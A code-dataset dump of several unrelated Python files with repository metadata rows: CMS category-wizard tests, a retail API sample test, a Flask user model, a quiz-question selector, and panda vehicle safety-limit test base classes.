if not requirement.get("namespace"):
invalid_params.append("namespace")
if not requirement.get("name"):
invalid_params.append("name")
if not requirement.get("display_name"):
invalid_params.append("display_name")
if "criteria" not in requirement:
invalid_params.append("criteria")
if invalid_params:
invalid_requirements.append(
"{requirement} has missing/invalid parameters: {params}".format(
requirement=requirement,
params=invalid_params,
)
)
return invalid_requirements
| 36.881549 | 120 | 0.6293 |
79546b27853b436a4e474d9be42a32f74248b522 | 15,802 | py | Python | tests/apps/courses/test_cms_wizards_category.py | openfun/richie | 185b2be74ce75de8de1da159773afc43e365df3e | [
"MIT"
] | 174 | 2018-04-14T23:36:01.000Z | 2022-03-10T09:27:01.000Z | tests/apps/courses/test_cms_wizards_category.py | EDUlib/richie | 3f9b14b929641f9392e54ba9badbb7a9a9fe7d44 | [
"MIT"
] | 631 | 2018-04-04T11:28:53.000Z | 2022-03-31T11:18:31.000Z | tests/apps/courses/test_cms_wizards_category.py | EDUlib/richie | 3f9b14b929641f9392e54ba9badbb7a9a9fe7d44 | [
"MIT"
] | 64 | 2018-06-27T08:35:01.000Z | 2022-03-10T09:27:43.000Z | """
Test suite for the wizard creating a new Category page
"""
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from cms.api import Page, create_page
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.factories import UserFactory
from richie.apps.courses.cms_wizards import CategoryWizardForm
from richie.apps.courses.factories import CategoryFactory
from richie.apps.courses.models import Category
class CategoryCMSWizardTestCase(CMSTestCase):
"""Testing the wizard that is used to create new category pages from the CMS"""
# Wizards list
def test_cms_wizards_category_create_wizards_list_superuser(self):
"""
The wizard to create a new category page should be present on the wizards list page
for a superuser.
"""
page = create_page("page", "richie/single_column.html", "en")
user = UserFactory(is_staff=True, is_superuser=True)
self.client.login(username=user.username, password="password")
# Let the authorized user get the page with all wizards listed
reverse_id = reverse("cms_wizard_create")
url = f"{reverse_id:s}?page={page.id:d}"
response = self.client.get(url)
# Check that our wizard to create categories is on this page
self.assertContains(
response,
'<span class="info">Create a new category page</span>',
status_code=200,
html=True,
)
self.assertContains(response, "<strong>New category page</strong>", html=True)
def test_cms_wizards_category_create_wizards_list_insufficient_permissions(self):
"""
The wizard to create a new category page should not be present on the wizards list page
for a user with insufficient permissions.
"""
any_page = create_page("page", "richie/single_column.html", "en")
required_permissions = ["courses.add_category"]
reverse_id = reverse("cms_wizard_create")
url = f"{reverse_id:s}?page={any_page.id:d}"
for permission_to_be_removed in required_permissions + [None]:
if permission_to_be_removed is None:
# This is the case of sufficient permissions treated in the next test
continue
altered_permissions = required_permissions.copy()
if permission_to_be_removed:
altered_permissions.remove(permission_to_be_removed)
user = UserFactory(is_staff=True, permissions=altered_permissions)
self.client.login(username=user.username, password="password")
# Let the authorized user get the page with all wizards listed
response = self.client.get(url)
# Check that our wizard to create categories is not on this page
self.assertNotContains(response, "category", status_code=200, html=True)
def test_cms_wizards_category_create_wizards_list_user_with_permissions(self):
"""
The wizard to create a new category page should be present on the wizards list page
for a user with the required permissions.
"""
page = create_page("page", "richie/single_column.html", "en")
# Login with a user with just the required permissions
user = UserFactory(
is_staff=True,
permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
)
self.client.login(username=user.username, password="password")
# Let the authorized user get the page with all wizards listed
reverse_id = reverse("cms_wizard_create")
url = f"{reverse_id:s}?page={page.id:d}"
response = self.client.get(url)
# Check that our wizard to create categorys is on this page
self.assertContains(
response,
'<span class="info">Create a new category page</span>',
status_code=200,
html=True,
)
self.assertContains(response, "<strong>New category page</strong>", html=True)
# Form submission
def test_cms_wizards_category_submit_form_insufficient_permission(self):
"""
A user with insufficient permissions trying to submit a CategoryWizardForm should trigger
a PermissionDenied exception.
We make loop to remove each time only one permission from the set of required permissions
and check that they are all required.
"""
# We want to create the category from an ordinary page
any_page = create_page("Any page", "richie/single_column.html", "en")
# A parent page should pre-exist
create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
required_permissions = ["courses.add_category"]
for is_staff in [True, False]:
for permission_to_be_removed in required_permissions + [None]:
if is_staff is True and permission_to_be_removed is None:
# This is the case of sufficient permissions treated in the next test
continue
altered_permissions = required_permissions.copy()
if permission_to_be_removed:
altered_permissions.remove(permission_to_be_removed)
user = UserFactory(is_staff=is_staff, permissions=altered_permissions)
form = CategoryWizardForm(
data={"title": "My title"},
wizard_language="en",
wizard_user=user,
wizard_page=any_page,
)
with self.assertRaises(PermissionDenied):
form.is_valid()
def test_cms_wizards_category_submit_form_from_any_page(self):
"""
A user with the required permissions submitting a valid CategoryWizardForm from any page
should be able to create a category at the top of the category tree and its related page.
"""
# We want to create the category from an ordinary page
any_page = create_page("Any page", "richie/single_column.html", "en")
# A parent page should pre-exist
parent_page = create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Create a user with just the required permissions
user = UserFactory(
is_staff=True,
permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
)
# We can submit a form with just the title set
form = CategoryWizardForm(
data={"title": "My title"},
wizard_language="en",
wizard_user=user,
wizard_page=any_page,
)
self.assertTrue(form.is_valid())
page = form.save()
# Related page should have been created as draft
Page.objects.drafts().get(id=page.id)
Category.objects.get(id=page.category.id, extended_object=page)
self.assertEqual(page.get_parent_page(), parent_page)
self.assertEqual(page.get_title(), "My title")
# The slug should have been automatically set
self.assertEqual(page.get_slug(), "my-title")
def test_cms_wizards_category_submit_form_from_category_page(self):
"""
Submitting a valid CategoryWizardForm from a category should create a sub category of this
category and its related page.
"""
# A parent page should pre-exist
create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Create a category when visiting an existing category
parent_category = CategoryFactory()
# Create a user with just the required permissions
user = UserFactory(
is_staff=True,
permissions=["courses.add_category", "cms.add_page", "cms.change_page"],
)
# We can submit a form with just the title set
form = CategoryWizardForm(
data={"title": "My title"},
wizard_language="en",
wizard_user=user,
wizard_page=parent_category.extended_object,
)
self.assertTrue(form.is_valid())
page = form.save()
# Related page should have been created as draft
Page.objects.drafts().get(id=page.id)
Category.objects.get(id=page.category.id, extended_object=page)
self.assertEqual(page.get_parent_page(), parent_category.extended_object)
self.assertEqual(page.get_title(), "My title")
# The slug should have been automatically set
self.assertEqual(page.get_slug(), "my-title")
def test_cms_wizards_category_submit_form_max_lengths(self):
"""
Check that the form correctly raises an error when the slug is too long. The path built
by combining the slug of the page with the slug of its parent page, should not exceed
255 characters in length.
"""
# A parent page with a very long slug
page = create_page(
"y" * 200,
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# A category with a slug at the limit length should work
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data={"title": "t" * 255, "slug": "s" * 54},
wizard_language="en",
wizard_user=user,
wizard_page=page,
)
self.assertTrue(form.is_valid())
form.save()
# A category with a slug too long with regards to the parent's one should raise an error
form = CategoryWizardForm(
data={"title": "t" * 255, "slug": "s" * 55},
wizard_language="en",
wizard_user=user,
wizard_page=page,
)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["slug"][0],
(
"This slug is too long. The length of the path built by prepending the slug of "
"the parent page would be 256 characters long and it should be less than 255"
),
)
def test_cms_wizards_category_submit_form_slugify_long_title(self):
"""
When generating the slug from the title, we should respect the slug's "max_length"
"""
# A parent page should pre-exist
page = create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Submit a title at max length
data = {"title": "t" * 255}
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data=data, wizard_language="en", wizard_user=user, wizard_page=page
)
self.assertTrue(form.is_valid())
page = form.save()
# Check that the slug has been truncated
self.assertEqual(page.get_slug(), "t" * 200)
def test_cms_wizards_category_submit_form_title_too_long(self):
"""
Trying to set a title that is too long should make the form invalid
"""
# A parent page should pre-exist
page = create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Submit a title that is too long and a slug that is ok
invalid_data = {"title": "t" * 256, "slug": "s" * 200}
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data=invalid_data, wizard_language="en", wizard_user=user, wizard_page=page
)
self.assertFalse(form.is_valid())
# Check that the title being too long is a cause for the invalid form
self.assertEqual(
form.errors["title"],
["Ensure this value has at most 255 characters (it has 256)."],
)
def test_cms_wizards_category_submit_form_slug_too_long(self):
"""
Trying to set a slug that is too long should make the form invalid
"""
# A parent page should pre-exist
page = create_page(
"Sujects",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Submit a slug that is too long and a title that is ok
invalid_data = {"title": "t" * 255, "slug": "s" * 201}
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data=invalid_data, wizard_language="en", wizard_user=user, wizard_page=page
)
self.assertFalse(form.is_valid())
# Check that the slug being too long is a cause for the invalid form
self.assertEqual(
form.errors["slug"],
["Ensure this value has at most 200 characters (it has 201)."],
)
def test_cms_wizards_category_submit_form_invalid_slug(self):
"""Trying to submit a slug that is not valid should raise a 400 exception."""
# A parent page should pre-exist
parent_page = create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Submit an invalid slug
data = {"title": "my title", "slug": "invalid slug"}
user = UserFactory(is_superuser=True, is_staff=True)
form = CategoryWizardForm(data=data, wizard_language="en", wizard_user=user)
form.page = parent_page
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors["slug"][0],
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
)
def test_cms_wizards_category_submit_form_slug_duplicate(self):
"""
Trying to create a category with a slug that would lead to a duplicate path should
raise a validation error.
"""
# A parent page should pre-exist
parent_page = create_page(
"Categories",
"richie/single_column.html",
"en",
reverse_id=Category.PAGE["reverse_id"],
)
# Create an existing page with a known slug
CategoryFactory(page_parent=parent_page, page_title="My title")
# Submit a title that will lead to the same slug
data = {"title": "my title"}
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data=data, wizard_language="en", wizard_user=user, wizard_page=parent_page
)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {"slug": ["This slug is already in use"]})
def test_cms_wizards_category_root_page_should_exist(self):
"""
We should not be able to create a category page if the root page does not exist
"""
page = create_page("page", "richie/single_column.html", "en")
user = UserFactory(is_staff=True, is_superuser=True)
form = CategoryWizardForm(
data={"title": "My title", "slug": "my-title"},
wizard_language="en",
wizard_user=user,
wizard_page=page,
)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors,
{
"slug": [
"You must first create a parent page and set its `reverse_id` to `categories`."
]
},
)
| 38.447689 | 99 | 0.614416 |
79546b4038a0189a4b01d776e87766c44acc4791 | 1,479 | py | Python | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | 1 | 2022-02-11T14:00:31.000Z | 2022-02-11T14:00:31.000Z | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | null | null | null | samples/interactive-tutorials/events/import_user_events_inline_test.py | tetiana-karasova/python-retail | b834c1fb16212e59241267e18d38b490e962af7f | [
"Apache-2.0"
] | 2 | 2022-01-28T09:53:16.000Z | 2022-02-07T14:27:38.000Z | # Copyright 2022 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import subprocess
def test_create_product():
output = str(
subprocess.check_output("python import_user_events_inline.py", shell=True)
)
assert re.match(
'.*import user events from inline source request.*?parent: "projects/.*?/locations/global/catalogs/default_catalog.*',
output,
)
assert re.match(
".*import user events from inline source request.*?input_config.*?user_event_inline_source.*",
output,
)
assert re.match(
".*the operation was started.*?projects/.*?/locations/global/catalogs/default_catalog/operations/import-user-events.*",
output,
)
assert re.match(".*import user events operation is done.*", output)
assert re.match(".*number of successfully imported events.*?3.*", output)
assert re.match(".*number of failures during the importing.*?0.*", output)
| 37.923077 | 127 | 0.709263 |
79546b9f73613f57d4634ebe00f96e4354b83837 | 1,057 | py | Python | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
] | null | null | null | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
] | 2 | 2020-07-24T17:06:43.000Z | 2020-07-24T17:14:32.000Z | app/models.py | afexer/apache-gunicorn-flask-socketio | 8d7a1c9475ea7f3f1955d38f5c529a9e23215771 | [
"MIT"
] | null | null | null | from werkzeug.security import generate_password_hash, check_password_hash
from app.db import db
from app.lm import lm
from flask_login import UserMixin
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(16), index=True, unique=True)
password_hash = db.Column(db.String(128))
def set_password(self, password):
self.password_hash = self.get_password_hash(password)
def get_password_hash(self, password):
return generate_password_hash(password)
def verify_password(self, password):
result = check_password_hash(self.password_hash, password)
return result
@staticmethod
def register(username, password):
user = User(username=username)
user.set_password(password)
db.session.add(user)
db.session.commit()
return user
def __repr__(self):
return '<User {0}>'.format(self.username)
@lm.user_loader
def load_user(_id):
return User.query.get(int(_id))
| 27.815789 | 73 | 0.701987 |
79546bfc7c23df57df635164b95e736d5f13352f | 3,817 | py | Python | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | paradigm/Selection.py | Paradigm-shift-AI/paradigm-brain | 5347a91dbb45b1352534a256968ce7f6ff6bb299 | [
"MIT"
] | null | null | null | import random
import operator
class Selection:
def __init__(self, preprocessed_question, list_of_questions, token=False):
"""
list_of_questions:
[
questionTypeID: [<question_object>],
]
"""
self.preprocessed_question = preprocessed_question
self.list_of_questions = list_of_questions
self.token = token
self.final_question = []
def __get_proper_noun(self):
if self.token:
return self.preprocessed_question["tag-intersection"]
jk = set()
for j in self.preprocessed_question["processed-sentences"]:
if "NNP" in j:
for k in j["NNP"]:
jk.add(k)
return list(jk)
def __select_fill_in_blanks(self):
for i in self.list_of_questions[1]:
if i["answer"] in self.__get_proper_noun():
insert = True
for k in self.final_question:
if i["question"] == k["question"]:
insert = False
break
if insert:
self.final_question.append(i)
def __select_true_or_false(self, type):
if self.token:
question_rank = {}
for i in self.list_of_questions[type]:
rating = 0
for j in self.preprocessed_question["tag-intersection"]:
if str(j) in i["question"]:
rating += 1
question_rank[i["question"]] = rating
sorted_tuple = sorted(question_rank.items(), key=operator.itemgetter(1), reverse=True)
for i in sorted_tuple[0:3]:
for j in self.list_of_questions[type]:
if i[0] == j["question"]:
insert = True
for k in self.final_question:
if j["question"] == k["question"]:
insert = False
break
if insert:
j["question"] = str(j["question"])
j["answer"] = str(j["answer"])
self.final_question.append(j)
else:
for i in self.list_of_questions[type]:
for j in self.preprocessed_question["tag"][0:5]:
if j in i["question"]:
j["question"] = str(j["question"])
j["answer"] = str(j["answer"])
self.final_question.append(i)
def __select_multiple_correct(self):
for i in self.list_of_questions[3]:
if i["answer1"] in self.__get_proper_noun():
if i["answer2"] in self.__get_proper_noun():
insert = True
for k in self.final_question:
if i["question"] == k["question"]:
insert = False
break
if insert:
self.final_question.append(i)
def __select_relevant_question(self):
def f(questionType):
return {
1: self.__select_fill_in_blanks(),
2: self.__select_true_or_false(2),
3: self.__select_multiple_correct(),
4: self.__select_true_or_false(4)
}[questionType]
for questionType in [2, 3, 4, 5]:
if questionType in self.list_of_questions:
f(questionType)
if len(self.final_question) > 2:
random.shuffle(self.final_question)
self.final_question = self.final_question[0:3]
def get_final_question(self):
self.__select_relevant_question()
return self.final_question
| 35.672897 | 98 | 0.496987 |
79546c901c98e841b7e09d9cf97c8e91beff8656 | 22,768 | py | Python | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | tests/safety/common.py | L-Net-1992/panda | e6c2b0ff01ea4eca283ea7c850e44675edcdebdf | [
"MIT"
] | null | null | null | import os
import abc
import unittest
import importlib
import numpy as np
from collections import defaultdict
from typing import Optional, List, Dict
from opendbc.can.packer import CANPacker # pylint: disable=import-error
from panda import ALTERNATIVE_EXPERIENCE, LEN_TO_DLC
from panda.tests.safety import libpandasafety_py
MAX_WRONG_COUNTERS = 5
def package_can_msg(msg):
addr, _, dat, bus = msg
ret = libpandasafety_py.ffi.new('CANPacket_t *')
ret[0].extended = 1 if addr >= 0x800 else 0
ret[0].addr = addr
ret[0].data_len_code = LEN_TO_DLC[len(dat)]
ret[0].bus = bus
ret[0].data = bytes(dat)
return ret
def make_msg(bus, addr, length=8):
return package_can_msg([addr, 0, b'\x00' * length, bus])
class CANPackerPanda(CANPacker):
def __init__(self, dbc_name):
super().__init__(dbc_name)
self._counters: Dict[str, int] = defaultdict(lambda: -1)
def make_can_msg_panda(self, name_or_addr, bus, values, counter=False, fix_checksum=None):
if counter:
self._counters[name_or_addr] += 1
msg = self.make_can_msg(name_or_addr, bus, values, counter=self._counters[name_or_addr])
if fix_checksum is not None:
msg = fix_checksum(msg)
return package_can_msg(msg)
class PandaSafetyTestBase(unittest.TestCase):
@classmethod
def setUpClass(cls):
if cls.__name__ == "PandaSafetyTestBase":
cls.safety = None
raise unittest.SkipTest
def _rx(self, msg):
return self.safety.safety_rx_hook(msg)
def _tx(self, msg):
return self.safety.safety_tx_hook(msg)
class InterceptorSafetyTest(PandaSafetyTestBase):
INTERCEPTOR_THRESHOLD = 0
@classmethod
def setUpClass(cls):
if cls.__name__ == "InterceptorSafetyTest":
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _interceptor_gas_cmd(self, gas):
pass
@abc.abstractmethod
def _interceptor_user_gas(self, gas):
pass
def test_prev_gas_interceptor(self):
self._rx(self._interceptor_user_gas(0x0))
self.assertFalse(self.safety.get_gas_interceptor_prev())
self._rx(self._interceptor_user_gas(0x1000))
self.assertTrue(self.safety.get_gas_interceptor_prev())
self._rx(self._interceptor_user_gas(0x0))
self.safety.set_gas_interceptor_detected(False)
def test_disengage_on_gas_interceptor(self):
for g in range(0, 0x1000):
self._rx(self._interceptor_user_gas(0))
self.safety.set_controls_allowed(True)
self._rx(self._interceptor_user_gas(g))
remain_enabled = g <= self.INTERCEPTOR_THRESHOLD
self.assertEqual(remain_enabled, self.safety.get_controls_allowed())
self._rx(self._interceptor_user_gas(0))
self.safety.set_gas_interceptor_detected(False)
def test_alternative_experience_no_disengage_on_gas_interceptor(self):
self.safety.set_controls_allowed(True)
self.safety.set_alternative_experience(ALTERNATIVE_EXPERIENCE.DISABLE_DISENGAGE_ON_GAS)
for g in range(0, 0x1000):
self._rx(self._interceptor_user_gas(g))
# Test we allow lateral, but not longitudinal
self.assertTrue(self.safety.get_controls_allowed())
self.assertEqual(g <= self.INTERCEPTOR_THRESHOLD, self.safety.get_longitudinal_allowed())
# Make sure we can re-gain longitudinal actuation
self._rx(self._interceptor_user_gas(0))
self.assertTrue(self.safety.get_longitudinal_allowed())
def test_allow_engage_with_gas_interceptor_pressed(self):
self._rx(self._interceptor_user_gas(0x1000))
self.safety.set_controls_allowed(1)
self._rx(self._interceptor_user_gas(0x1000))
self.assertTrue(self.safety.get_controls_allowed())
self._rx(self._interceptor_user_gas(0))
def test_gas_interceptor_safety_check(self):
for gas in np.arange(0, 4000, 100):
for controls_allowed in [True, False]:
self.safety.set_controls_allowed(controls_allowed)
if controls_allowed:
send = True
else:
send = gas == 0
self.assertEqual(send, self._tx(self._interceptor_gas_cmd(gas)))
class TorqueSteeringSafetyTestBase(PandaSafetyTestBase):
MAX_RATE_UP = 0
MAX_RATE_DOWN = 0
MAX_TORQUE = 0
MAX_RT_DELTA = 0
RT_INTERVAL = 0
@classmethod
def setUpClass(cls):
if cls.__name__ == "TorqueSteeringSafetyTestBase":
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _torque_cmd_msg(self, torque, steer_req=1):
pass
def _set_prev_torque(self, t):
self.safety.set_desired_torque_last(t)
self.safety.set_rt_torque_last(t)
def test_steer_safety_check(self):
for enabled in [0, 1]:
for t in range(-self.MAX_TORQUE * 2, self.MAX_TORQUE * 2):
self.safety.set_controls_allowed(enabled)
self._set_prev_torque(t)
if abs(t) > self.MAX_TORQUE or (not enabled and abs(t) > 0):
self.assertFalse(self._tx(self._torque_cmd_msg(t)))
else:
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
def test_non_realtime_limit_up(self):
self.safety.set_controls_allowed(True)
self._set_prev_torque(0)
self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_RATE_UP)))
self._set_prev_torque(0)
self.assertTrue(self._tx(self._torque_cmd_msg(-self.MAX_RATE_UP)))
self._set_prev_torque(0)
self.assertFalse(self._tx(self._torque_cmd_msg(self.MAX_RATE_UP + 1)))
self.safety.set_controls_allowed(True)
self._set_prev_torque(0)
self.assertFalse(self._tx(self._torque_cmd_msg(-self.MAX_RATE_UP - 1)))
class DriverTorqueSteeringSafetyTest(TorqueSteeringSafetyTestBase):
DRIVER_TORQUE_ALLOWANCE = 0
DRIVER_TORQUE_FACTOR = 0
@classmethod
def setUpClass(cls):
if cls.__name__ == "DriverTorqueSteeringSafetyTest":
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _torque_cmd_msg(self, torque, steer_req=1):
pass
def test_non_realtime_limit_up(self):
self.safety.set_torque_driver(0, 0)
super().test_non_realtime_limit_up()
# TODO: make this test something
def test_non_realtime_limit_down(self):
self.safety.set_torque_driver(0, 0)
self.safety.set_controls_allowed(True)
def test_against_torque_driver(self):
self.safety.set_controls_allowed(True)
for sign in [-1, 1]:
for t in np.arange(0, self.DRIVER_TORQUE_ALLOWANCE + 1, 1):
t *= -sign
self.safety.set_torque_driver(t, t)
self._set_prev_torque(self.MAX_TORQUE * sign)
self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_TORQUE * sign)))
self.safety.set_torque_driver(self.DRIVER_TORQUE_ALLOWANCE + 1, self.DRIVER_TORQUE_ALLOWANCE + 1)
self.assertFalse(self._tx(self._torque_cmd_msg(-self.MAX_TORQUE)))
# arbitrary high driver torque to ensure max steer torque is allowed
max_driver_torque = int(self.MAX_TORQUE / self.DRIVER_TORQUE_FACTOR + self.DRIVER_TORQUE_ALLOWANCE + 1)
# spot check some individual cases
for sign in [-1, 1]:
driver_torque = (self.DRIVER_TORQUE_ALLOWANCE + 10) * sign
torque_desired = (self.MAX_TORQUE - 10 * self.DRIVER_TORQUE_FACTOR) * sign
delta = 1 * sign
self._set_prev_torque(torque_desired)
self.safety.set_torque_driver(-driver_torque, -driver_torque)
self.assertTrue(self._tx(self._torque_cmd_msg(torque_desired)))
self._set_prev_torque(torque_desired + delta)
self.safety.set_torque_driver(-driver_torque, -driver_torque)
self.assertFalse(self._tx(self._torque_cmd_msg(torque_desired + delta)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertTrue(self._tx(self._torque_cmd_msg((self.MAX_TORQUE - self.MAX_RATE_DOWN) * sign)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertTrue(self._tx(self._torque_cmd_msg(0)))
self._set_prev_torque(self.MAX_TORQUE * sign)
self.safety.set_torque_driver(-max_driver_torque * sign, -max_driver_torque * sign)
self.assertFalse(self._tx(self._torque_cmd_msg((self.MAX_TORQUE - self.MAX_RATE_DOWN + 1) * sign)))
def test_realtime_limits(self):
self.safety.set_controls_allowed(True)
for sign in [-1, 1]:
self.safety.init_tests()
self._set_prev_torque(0)
self.safety.set_torque_driver(0, 0)
for t in np.arange(0, self.MAX_RT_DELTA, 1):
t *= sign
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
self._set_prev_torque(0)
for t in np.arange(0, self.MAX_RT_DELTA, 1):
t *= sign
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
# Increase timer to update rt_torque_last
self.safety.set_timer(self.RT_INTERVAL + 1)
self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA - 1))))
self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
class MotorTorqueSteeringSafetyTest(TorqueSteeringSafetyTestBase):
MAX_TORQUE_ERROR = 0
TORQUE_MEAS_TOLERANCE = 0
@classmethod
def setUpClass(cls):
if cls.__name__ == "MotorTorqueSteeringSafetyTest":
cls.safety = None
raise unittest.SkipTest
@abc.abstractmethod
def _torque_meas_msg(self, torque):
pass
@abc.abstractmethod
def _torque_cmd_msg(self, torque, steer_req=1):
pass
def _set_prev_torque(self, t):
super()._set_prev_torque(t)
self.safety.set_torque_meas(t, t)
def test_torque_absolute_limits(self):
for controls_allowed in [True, False]:
for torque in np.arange(-self.MAX_TORQUE - 1000, self.MAX_TORQUE + 1000, self.MAX_RATE_UP):
self.safety.set_controls_allowed(controls_allowed)
self.safety.set_rt_torque_last(torque)
self.safety.set_torque_meas(torque, torque)
self.safety.set_desired_torque_last(torque - self.MAX_RATE_UP)
if controls_allowed:
send = (-self.MAX_TORQUE <= torque <= self.MAX_TORQUE)
else:
send = torque == 0
self.assertEqual(send, self._tx(self._torque_cmd_msg(torque)))
def test_non_realtime_limit_down(self):
self.safety.set_controls_allowed(True)
torque_meas = self.MAX_TORQUE - self.MAX_TORQUE_ERROR - 50
self.safety.set_rt_torque_last(self.MAX_TORQUE)
self.safety.set_torque_meas(torque_meas, torque_meas)
self.safety.set_desired_torque_last(self.MAX_TORQUE)
self.assertTrue(self._tx(self._torque_cmd_msg(self.MAX_TORQUE - self.MAX_RATE_DOWN)))
self.safety.set_rt_torque_last(self.MAX_TORQUE)
self.safety.set_torque_meas(torque_meas, torque_meas)
self.safety.set_desired_torque_last(self.MAX_TORQUE)
self.assertFalse(self._tx(self._torque_cmd_msg(self.MAX_TORQUE - self.MAX_RATE_DOWN + 1)))
def test_exceed_torque_sensor(self):
self.safety.set_controls_allowed(True)
for sign in [-1, 1]:
self._set_prev_torque(0)
for t in np.arange(0, self.MAX_TORQUE_ERROR + 2, 2): # step needs to be smaller than MAX_TORQUE_ERROR
t *= sign
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_TORQUE_ERROR + 2))))
def test_realtime_limit_up(self):
self.safety.set_controls_allowed(True)
for sign in [-1, 1]:
self.safety.init_tests()
self._set_prev_torque(0)
for t in np.arange(0, self.MAX_RT_DELTA + 1, 1):
t *= sign
self.safety.set_torque_meas(t, t)
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
self.assertFalse(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
self._set_prev_torque(0)
for t in np.arange(0, self.MAX_RT_DELTA + 1, 1):
t *= sign
self.safety.set_torque_meas(t, t)
self.assertTrue(self._tx(self._torque_cmd_msg(t)))
# Increase timer to update rt_torque_last
self.safety.set_timer(self.RT_INTERVAL + 1)
self.assertTrue(self._tx(self._torque_cmd_msg(sign * self.MAX_RT_DELTA)))
self.assertTrue(self._tx(self._torque_cmd_msg(sign * (self.MAX_RT_DELTA + 1))))
def test_torque_measurements(self):
trq = 50
for t in [trq, -trq, 0, 0, 0, 0]:
self._rx(self._torque_meas_msg(t))
max_range = range(trq, trq + self.TORQUE_MEAS_TOLERANCE + 1)
min_range = range(-(trq + self.TORQUE_MEAS_TOLERANCE), -trq + 1)
self.assertTrue(self.safety.get_torque_meas_min() in min_range)
self.assertTrue(self.safety.get_torque_meas_max() in max_range)
max_range = range(0, self.TORQUE_MEAS_TOLERANCE + 1)
min_range = range(-(trq + self.TORQUE_MEAS_TOLERANCE), -trq + 1)
self._rx(self._torque_meas_msg(0))
self.assertTrue(self.safety.get_torque_meas_min() in min_range)
self.assertTrue(self.safety.get_torque_meas_max() in max_range)
max_range = range(0, self.TORQUE_MEAS_TOLERANCE + 1)
min_range = range(-self.TORQUE_MEAS_TOLERANCE, 0 + 1)
self._rx(self._torque_meas_msg(0))
self.assertTrue(self.safety.get_torque_meas_min() in min_range)
self.assertTrue(self.safety.get_torque_meas_max() in max_range)
class PandaSafetyTest(PandaSafetyTestBase):
TX_MSGS: Optional[List[List[int]]] = None
SCANNED_ADDRS = [*range(0x0, 0x800), # Entire 11-bit CAN address space
*range(0x18DA00F1, 0x18DB00F1, 0x100), # 29-bit UDS physical addressing
*range(0x18DB00F1, 0x18DC00F1, 0x100), # 29-bit UDS functional addressing
*range(0x3300, 0x3400), # Honda
0x10400060, 0x104c006c] # GMLAN (exceptions, range/format unclear)
STANDSTILL_THRESHOLD: Optional[float] = None
GAS_PRESSED_THRESHOLD = 0
